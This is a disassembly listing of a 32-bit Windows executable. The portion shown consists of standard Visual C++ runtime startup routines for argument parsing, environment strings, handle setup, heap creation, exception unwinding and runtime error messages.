cmp byte ptr [eax], 5Ch
jnz short loc_402FEF
inc eax
inc ebx
jmp short loc_402FE6
; ---------------------------------------------------------------------------
loc_402FEF: ; CODE XREF: sub_402EF1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_403020
test bl, 1
jnz short loc_40301E
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_40300D
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_40300D
mov eax, edx
jmp short loc_403010
; ---------------------------------------------------------------------------
loc_40300D: ; CODE XREF: sub_402EF1+10D�j
; sub_402EF1+116�j
mov [ebp+arg_0], edi
loc_403010: ; CODE XREF: sub_402EF1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40301E: ; CODE XREF: sub_402EF1+106�j
shr ebx, 1
loc_403020: ; CODE XREF: sub_402EF1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403035
inc ebx
loc_403028: ; CODE XREF: sub_402EF1+142�j
test esi, esi
jz short loc_403030
mov byte ptr [esi], 5Ch
inc esi
loc_403030: ; CODE XREF: sub_402EF1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403028
loc_403035: ; CODE XREF: sub_402EF1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403085
cmp [ebp+arg_10], 0
jnz short loc_40304B
cmp dl, 20h
jz short loc_403085
cmp dl, 9
jz short loc_403085
loc_40304B: ; CODE XREF: sub_402EF1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40307F
test esi, esi
jz short loc_40306E
movzx ebx, dl
test byte_407221[ebx], 4
jz short loc_403067
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403067: ; CODE XREF: sub_402EF1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40307D
; ---------------------------------------------------------------------------
loc_40306E: ; CODE XREF: sub_402EF1+162�j
movzx edx, dl
test byte_407221[edx], 4
jz short loc_40307D
inc eax
inc dword ptr [ecx]
loc_40307D: ; CODE XREF: sub_402EF1+17B�j
; sub_402EF1+187�j
inc dword ptr [ecx]
loc_40307F: ; CODE XREF: sub_402EF1+15E�j
inc eax
jmp loc_402FDD
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_402EF1+148�j
; sub_402EF1+153�j ...
test esi, esi
jz short loc_40308D
and byte ptr [esi], 0
inc esi
loc_40308D: ; CODE XREF: sub_402EF1+196�j
inc dword ptr [ecx]
jmp loc_402FAB
; ---------------------------------------------------------------------------
loc_403094: ; CODE XREF: sub_402EF1+BD�j
; sub_402EF1+D5�j
test edi, edi
jz short loc_40309B
and dword ptr [edi], 0
loc_40309B: ; CODE XREF: sub_402EF1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402EF1 endp
; =============== S U B R O U T I N E =======================================
sub_4030A5 proc near ; CODE XREF: .text:004028BD�p
var_8 = dword ptr -8
cchWideChar = dword ptr -4
push ecx
push ecx
mov eax, dword_4070A0
push ebx
push ebp
mov ebp, GetEnvironmentStringsW
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4030F3
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4030D4
mov dword_4070A0, 1
jmp short loc_4030FC
; ---------------------------------------------------------------------------
loc_4030D4: ; CODE XREF: sub_4030A5+21�j
call GetEnvironmentStrings ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_4031CE
mov dword_4070A0, 2
jmp loc_403182
; ---------------------------------------------------------------------------
loc_4030F3: ; CODE XREF: sub_4030A5+19�j
cmp eax, 1
jnz loc_40317D
loc_4030FC: ; CODE XREF: sub_4030A5+2D�j
cmp esi, ebx
jnz short loc_40310C
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_4031CE
loc_40310C: ; CODE XREF: sub_4030A5+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403121
loc_403113: ; CODE XREF: sub_4030A5+73�j
; sub_4030A5+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
inc eax
inc eax
cmp [eax], bx
jnz short loc_403113
loc_403121: ; CODE XREF: sub_4030A5+6C�j
sub eax, esi
mov edi, WideCharToMultiByte
sar eax, 1
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
inc eax
push ebx ; cbMultiByte
push ebx ; lpMultiByteStr
push eax ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
mov [esp+38h+cchWideChar], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_403172
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403172
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebp ; cbMultiByte
push eax ; lpMultiByteStr
push [esp+28h+cchWideChar] ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40316E
push [esp+18h+var_8]
call sub_403C87
pop ecx
mov [esp+18h+var_8], ebx
loc_40316E: ; CODE XREF: sub_4030A5+B9�j
mov ebx, [esp+18h+var_8]
loc_403172: ; CODE XREF: sub_4030A5+99�j
; sub_4030A5+A8�j
push esi ; LPWCH
call FreeEnvironmentStringsW ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_40317D: ; CODE XREF: sub_4030A5+51�j
cmp eax, 2
jnz short loc_4031CE
loc_403182: ; CODE XREF: sub_4030A5+49�j
cmp edi, ebx
jnz short loc_403192
call GetEnvironmentStrings ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_4031CE
loc_403192: ; CODE XREF: sub_4030A5+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_4031A2
loc_403198: ; CODE XREF: sub_4030A5+F6�j
; sub_4030A5+FB�j
inc eax
cmp [eax], bl
jnz short loc_403198
inc eax
cmp [eax], bl
jnz short loc_403198
loc_4031A2: ; CODE XREF: sub_4030A5+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4031B8
xor esi, esi
jmp short loc_4031C3
; ---------------------------------------------------------------------------
loc_4031B8: ; CODE XREF: sub_4030A5+10D�j
push ebp
push edi
push esi
call sub_402290
add esp, 0Ch
loc_4031C3: ; CODE XREF: sub_4030A5+111�j
push edi ; LPCH
call FreeEnvironmentStringsA ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4031D0
; ---------------------------------------------------------------------------
loc_4031CE: ; CODE XREF: sub_4030A5+39�j
; sub_4030A5+61�j ...
xor eax, eax
loc_4031D0: ; CODE XREF: sub_4030A5+D6�j
; sub_4030A5+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4030A5 endp
; =============== S U B R O U T I N E =======================================
sub_4031D7 proc near ; CODE XREF: .text:004028AD�p
StartupInfo = _STARTUPINFOA ptr -44h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403CB6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4031F7
push 1Bh ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_4031F7: ; CODE XREF: sub_4031D7+16�j
mov dword_407340, esi
mov hResData, 20h
lea eax, [esi+100h]
loc_40320D: ; CODE XREF: sub_4031D7+52�j
cmp esi, eax
jnb short loc_40322B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_407340
add esi, 8
add eax, 100h
jmp short loc_40320D
; ---------------------------------------------------------------------------
loc_40322B: ; CODE XREF: sub_4031D7+38�j
lea eax, [esp+54h+StartupInfo]
push eax ; lpStartupInfo
call GetStartupInfoA ; GetStartupInfoA
cmp [esp+54h+StartupInfo.cbReserved2], 0
jz loc_403307
mov eax, [esp+54h+StartupInfo.lpReserved2]
test eax, eax
jz loc_403307
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403261
mov esi, eax
loc_403261: ; CODE XREF: sub_4031D7+86�j
cmp hResData, esi
jge short loc_4032BB
mov edi, offset dword_407344
loc_40326E: ; CODE XREF: sub_4031D7+DA�j
push 100h
call sub_403CB6
test eax, eax
pop ecx
jz short loc_4032B5
add hResData, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40328C: ; CODE XREF: sub_4031D7+CF�j
cmp eax, ecx
jnb short loc_4032A8
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40328C
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_4031D7+B7�j
add edi, 4
cmp hResData, esi
jl short loc_40326E
jmp short loc_4032BB
; ---------------------------------------------------------------------------
loc_4032B5: ; CODE XREF: sub_4031D7+A4�j
mov esi, hResData
loc_4032BB: ; CODE XREF: sub_4031D7+90�j
; sub_4031D7+DC�j
xor edi, edi
test esi, esi
jle short loc_403307
loc_4032C1: ; CODE XREF: sub_4031D7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4032FE
mov cl, [ebp+0]
test cl, 1
jz short loc_4032FE
test cl, 8
jnz short loc_4032E0
push eax ; hFile
call GetFileType ; GetFileType
test eax, eax
jz short loc_4032FE
loc_4032E0: ; CODE XREF: sub_4031D7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_407340[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4032FE: ; CODE XREF: sub_4031D7+EF�j
; sub_4031D7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4032C1
loc_403307: ; CODE XREF: sub_4031D7+65�j
; sub_4031D7+71�j ...
xor ebx, ebx
loc_403309: ; CODE XREF: sub_4031D7+195�j
mov eax, dword_407340
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403364
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403324
push 0FFFFFFF6h
pop eax
jmp short loc_40332E
; ---------------------------------------------------------------------------
loc_403324: ; CODE XREF: sub_4031D7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40332E: ; CODE XREF: sub_4031D7+14B�j
push eax ; nStdHandle
call GetStdHandle ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403353
push edi ; hFile
call GetFileType ; GetFileType
test eax, eax
jz short loc_403353
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_403359
loc_403353: ; CODE XREF: sub_4031D7+163�j
; sub_4031D7+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403359: ; CODE XREF: sub_4031D7+17A�j
cmp eax, 3
jnz short loc_403368
or byte ptr [esi+4], 8
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403364: ; CODE XREF: sub_4031D7+13E�j
or byte ptr [esi+4], 80h
loc_403368: ; CODE XREF: sub_4031D7+180�j
; sub_4031D7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_403309
push hResData ; hResData
call LockResource ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4031D7 endp
; =============== S U B R O U T I N E =======================================
sub_403382 proc near ; CODE XREF: .text:00402898�p
arg_0 = dword ptr 4
xor eax, eax
push 0 ; dwMaximumSize
cmp [esp+4+arg_0], eax
push 1000h ; dwInitialSize
setz al
push eax ; flOptions
call HeapCreate ; HeapCreate
test eax, eax
mov hHeap, eax
jz short loc_4033B7
call sub_403D2A
test eax, eax
jnz short loc_4033BA
push hHeap ; hHeap
call HeapDestroy ; HeapDestroy
loc_4033B7: ; CODE XREF: sub_403382+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_403382+27�j
push 1
pop eax
retn
sub_403382 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033C0 proc near ; CODE XREF: sub_4034B8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4033D8
push [ebp+arg_0]
call RtlUnwind ; RtlUnwind
loc_4033D8: ; DATA XREF: sub_4033C0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4033C0 endp
; =============== S U B R O U T I N E =======================================
sub_4033E0 proc near ; DATA XREF: sub_403402+A�o
; .text:00403473�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_403401
mov eax, [esp+arg_4]
loc_4033F6: ; DATA XREF: sub_409B29+262�w
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_403401: ; CODE XREF: sub_4033E0+10�j
retn
sub_4033E0 endp
; =============== S U B R O U T I N E =======================================
sub_403402 proc near ; CODE XREF: sub_4034B8+67�p
; sub_4034B8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4033E0
push large dword ptr fs:0
mov large fs:0, esp
loc_40341F: ; CODE XREF: sub_403402:loc_40345A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
loc_403429: ; DATA XREF: .rsrc:0040B0E5�r
; .rsrc:loc_40B0FF�r ...
cmp esi, 0FFFFFFFFh
jz short loc_40345C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40345C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40345A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403496
call dword ptr [ebx+esi*4+8]
loc_40345A: ; CODE XREF: sub_403402+44�j
jmp short loc_40341F
; ---------------------------------------------------------------------------
loc_40345C: ; CODE XREF: sub_403402+2A�j
; sub_403402+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_403402 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4033E0
jnz short locret_40348C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40348C
mov eax, 1
locret_40348C: ; CODE XREF: .text:0040347A�j
; .text:00403485�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406D8C
jmp short loc_4034A0
; =============== S U B R O U T I N E =======================================
sub_403496 proc near ; CODE XREF: sub_403402+4F�p
; sub_4034B8+78�p
push ebx
push ecx
mov ebx, offset dword_406D8C
mov ecx, [ebp+8]
loc_4034A0: ; CODE XREF: .text:00403494�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403496 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B8 proc near ; DATA XREF: .text:00402848�o
; sub_40371C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403558
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4034EB: ; CODE XREF: sub_4034B8:loc_403548�j
cmp esi, 0FFFFFFFFh
jz short loc_403551
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40353F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40353F
js short loc_40354A
mov edi, [ebx+8]
push ebx
call sub_4033C0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_403402
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403496
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40353F: ; CODE XREF: sub_4034B8+40�j
; sub_4034B8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
loc_403548: ; DATA XREF: sub_409B29+EA�w
; sub_409F8C+3�r ...
jmp short loc_4034EB
; ---------------------------------------------------------------------------
loc_40354A: ; CODE XREF: sub_4034B8+54�j
mov eax, 0
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403551: ; CODE XREF: sub_4034B8+36�j
mov eax, 1
jmp short loc_40356D
; ---------------------------------------------------------------------------
loc_403558: ; CODE XREF: sub_4034B8+18�j
; DATA XREF: sub_409B29+F8�r
push ebp
lea ebp, [ebx+10h]
loc_40355C: ; DATA XREF: sub_40B7A0+3C�r
push 0FFFFFFFFh
push ebx
call sub_403402
add esp, 8
pop ebp
mov eax, 1
loc_40356D: ; CODE XREF: sub_4034B8+97�j
; sub_4034B8+9E�j
pop ebp
pop edi
pop esi
loc_403570: ; DATA XREF: sub_409B29:loc_409D12�r
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
loc_40357C: ; DATA XREF: sub_40B7A0+7�r
mov eax, [ecx+1Ch]
push eax
loc_403580: ; DATA XREF: sub_40B7A0+79�r
mov eax, [ecx+18h]
push eax
loc_403584: ; DATA XREF: sub_40B7A0+62�r
call sub_403402
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403590 proc near ; CODE XREF: sub_402934+9�p
; sub_402959+9�p
mov eax, dword_406F48
cmp eax, 1
jz short loc_4035A7
test eax, eax
loc_40359C: ; DATA XREF: .rsrc:00409E55�o
; .rsrc:off_40A89A�o
jnz short locret_4035C8
cmp dword_406AD4, 1
jnz short locret_4035C8
loc_4035A7: ; CODE XREF: sub_403590+8�j
push 0FCh ; NumberOfBytesWritten
call sub_4035C9
mov eax, dword_4070A4
pop ecx
test eax, eax
jz short loc_4035BD
call eax ; dword_4070A4
loc_4035BD: ; CODE XREF: sub_403590+29�j
push 0FFh ; NumberOfBytesWritten
call sub_4035C9
pop ecx
locret_4035C8: ; CODE XREF: sub_403590:loc_40359C�j
; sub_403590+15�j
; DATA XREF: ...
retn
sub_403590 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4035C9(DWORD NumberOfBytesWritten)
sub_4035C9 proc near ; CODE XREF: sub_402934+12�p
; sub_402959+12�p ...
Filename = byte ptr -1A4h
var_A0 = byte ptr -0A0h
NumberOfBytesWritten= dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+NumberOfBytesWritten]
xor ecx, ecx
mov eax, offset dword_406DA0
loc_4035DC: ; CODE XREF: sub_4035C9+20�j
; DATA XREF: sub_409B29+257�r ...
cmp edx, [eax]
jz short loc_4035EB
loc_4035E0: ; DATA XREF: sub_409B29+2CD�r
add eax, 8
inc ecx
loc_4035E4: ; DATA XREF: sub_409B29+2F6�r
; .rsrc:0040A39C�r
cmp eax, offset byte_406E30
jl short loc_4035DC
loc_4035EB: ; CODE XREF: sub_4035C9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_406DA0[esi]
jnz loc_403719
mov eax, dword_406F48
cmp eax, 1
jz loc_4036F3
test eax, eax
jnz short loc_40361C
cmp dword_406AD4, 1
jz loc_4036F3
loc_40361C: ; CODE XREF: sub_4035C9+44�j
cmp edx, 0FCh
jz loc_403719
lea eax, [ebp+Filename]
push 104h ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
test eax, eax
jnz short loc_403653
loc_403640: ; DATA XREF: .rsrc:0040A7E2�r
lea eax, [ebp+Filename]
loc_403646: ; DATA XREF: sub_40A4EF�r sub_40A4EF+B�w
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402720
pop ecx
pop ecx
loc_403653: ; CODE XREF: sub_4035C9+75�j
lea eax, [ebp+Filename]
push edi
push eax
lea edi, [ebp+Filename]
call sub_402210
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403696
lea eax, [ebp+Filename]
push eax
call sub_402210
mov edi, eax
lea eax, [ebp+Filename]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_404600
add esp, 10h
loc_403696: ; CODE XREF: sub_4035C9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402720
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402730
lea eax, [ebp+var_A0]
push offset asc_4053E8 ; "\n\n"
push eax
call sub_402730
push off_406DA4[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402730
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404573
add esp, 2Ch
pop edi
jmp short loc_403719
; ---------------------------------------------------------------------------
loc_4036F3: ; CODE XREF: sub_4035C9+3C�j
; sub_4035C9+4D�j
lea eax, [ebp+NumberOfBytesWritten]
lea esi, off_406DA4[esi]
push 0 ; lpOverlapped
push eax ; lpNumberOfBytesWritten
push dword ptr [esi]
call sub_402210
pop ecx
push eax ; nNumberOfBytesToWrite
push dword ptr [esi] ; lpBuffer
push 0FFFFFFF4h ; nStdHandle
call GetStdHandle ; GetStdHandle
push eax ; hFile
call WriteFile ; WriteFile
loc_403719: ; CODE XREF: sub_4035C9+2E�j
; sub_4035C9+59�j ...
pop esi
leave
retn
sub_4035C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40371C(DWORD dwInfoType, LPCSTR lpMultiByteStr, int cbMultiByte, LPWORD lpCharType, UINT CodePage, LCID Locale, int)
sub_40371C proc near ; CODE XREF: sub_402A4C+5E�p
; sub_403AE6+9A�p
var_24 = dword ptr -24h
cchWideChar = dword ptr -20h
CharType = word ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
dwInfoType = dword ptr 8
lpMultiByteStr = dword ptr 0Ch
cbMultiByte = dword ptr 10h
lpCharType = dword ptr 14h
CodePage = dword ptr 18h
Locale = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405428
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_4070A8
xor ebx, ebx
cmp eax, ebx
jnz short loc_40378B
lea eax, [ebp+CharType]
push eax ; lpCharType
push 1
pop esi
push esi ; cchSrc
push offset SrcStr ; lpSrcStr
push esi ; dwInfoType
call GetStringTypeW ; GetStringTypeW
test eax, eax
jz short loc_403769
mov eax, esi
jmp short loc_403786
; ---------------------------------------------------------------------------
loc_403769: ; CODE XREF: sub_40371C+47�j
lea eax, [ebp+CharType]
push eax ; lpCharType
push esi ; cchSrc
push offset byte_406F38 ; lpSrcStr
push esi ; dwInfoType
push ebx ; Locale
call GetStringTypeA ; GetStringTypeA
test eax, eax
jz loc_403851
push 2
pop eax
loc_403786: ; CODE XREF: sub_40371C+4B�j
mov dword_4070A8, eax
loc_40378B: ; CODE XREF: sub_40371C+2F�j
cmp eax, 2
jnz short loc_4037B4
mov eax, [ebp+Locale]
cmp eax, ebx
jnz short loc_40379C
mov eax, dword_4070C4
loc_40379C: ; CODE XREF: sub_40371C+79�j
push [ebp+lpCharType] ; lpCharType
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
push eax ; Locale
call GetStringTypeA ; GetStringTypeA
jmp loc_403853
; ---------------------------------------------------------------------------
loc_4037B4: ; CODE XREF: sub_40371C+72�j
cmp eax, 1
jnz loc_403851
cmp [ebp+CodePage], ebx
jnz short loc_4037CA
mov eax, dword_4070D4
mov [ebp+CodePage], eax
loc_4037CA: ; CODE XREF: sub_40371C+A4�j
push ebx ; cchWideChar
push ebx ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+cchWideChar], eax
cmp eax, ebx
jz short loc_403851
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4021B0
add esp, 0Ch
jmp short loc_403820
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403820: ; CODE XREF: sub_40371C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403851
push [ebp+cchWideChar] ; cchWideChar
push esi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403851
push [ebp+lpCharType] ; lpCharType
push eax ; cchSrc
push esi ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
call GetStringTypeW ; GetStringTypeW
jmp short loc_403853
; ---------------------------------------------------------------------------
loc_403851: ; CODE XREF: sub_40371C+61�j
; sub_40371C+9B�j ...
xor eax, eax
loc_403853: ; CODE XREF: sub_40371C+93�j
; sub_40371C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40371C endp
; =============== S U B R O U T I N E =======================================
sub_403865 proc near ; CODE XREF: sub_402D47+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403876
add esp, 0Ch
retn
sub_403865 endp
; =============== S U B R O U T I N E =======================================
sub_403876 proc near ; CODE XREF: sub_403865+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_407221[eax], cl
jnz short loc_4038A3
cmp [esp+arg_4], 0
jz short loc_40389C
movzx eax, word_406AEA[eax*2]
and eax, [esp+arg_4]
jmp short loc_40389E
; ---------------------------------------------------------------------------
loc_40389C: ; CODE XREF: sub_403876+16�j
xor eax, eax
loc_40389E: ; CODE XREF: sub_403876+24�j
test eax, eax
jnz short loc_4038A3
retn
; ---------------------------------------------------------------------------
loc_4038A3: ; CODE XREF: sub_403876+F�j
; sub_403876+2A�j
push 1
pop eax
retn
sub_403876 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038A7 proc near ; CODE XREF: sub_403C6B+B�p
CPInfo = _cpinfo ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403A40
mov esi, eax
pop ecx
cmp esi, CodePage
mov [ebp+arg_0], esi
jz loc_403A34
xor ebx, ebx
cmp esi, ebx
jz loc_403A2A
xor edx, edx
mov eax, offset dword_406E38
loc_4038DB: ; CODE XREF: sub_4038A7+41�j
cmp [eax], esi
jz short loc_403951
add eax, 30h
inc edx
cmp eax, offset dword_406F28
jl short loc_4038DB
lea eax, [ebp+CPInfo]
push eax ; lpCPInfo
push esi ; CodePage
call GetCPInfo ; GetCPInfo
cmp eax, 1
jnz loc_403A22
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_407220
cmp [ebp+CPInfo.MaxCharSize], 1
mov CodePage, esi
rep stosd
stosb
mov Locale, ebx
jbe loc_403A10
cmp [ebp+CPInfo.LeadByte], 0
jz loc_4039E6
lea ecx, [ebp+CPInfo.LeadByte+1]
loc_40392E: ; CODE XREF: sub_4038A7+139�j
mov dl, [ecx]
test dl, dl
jz loc_4039E6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_40393F: ; CODE XREF: sub_4038A7+A8�j
cmp eax, edx
ja loc_4039DA
or byte_407221[eax], 4
inc eax
jmp short loc_40393F
; ---------------------------------------------------------------------------
loc_403951: ; CODE XREF: sub_4038A7+36�j
push 40h
xor eax, eax
pop ecx
loc_403956: ; DATA XREF: sub_40B7A0+4B�w
; sub_40B7A0+73�r ...
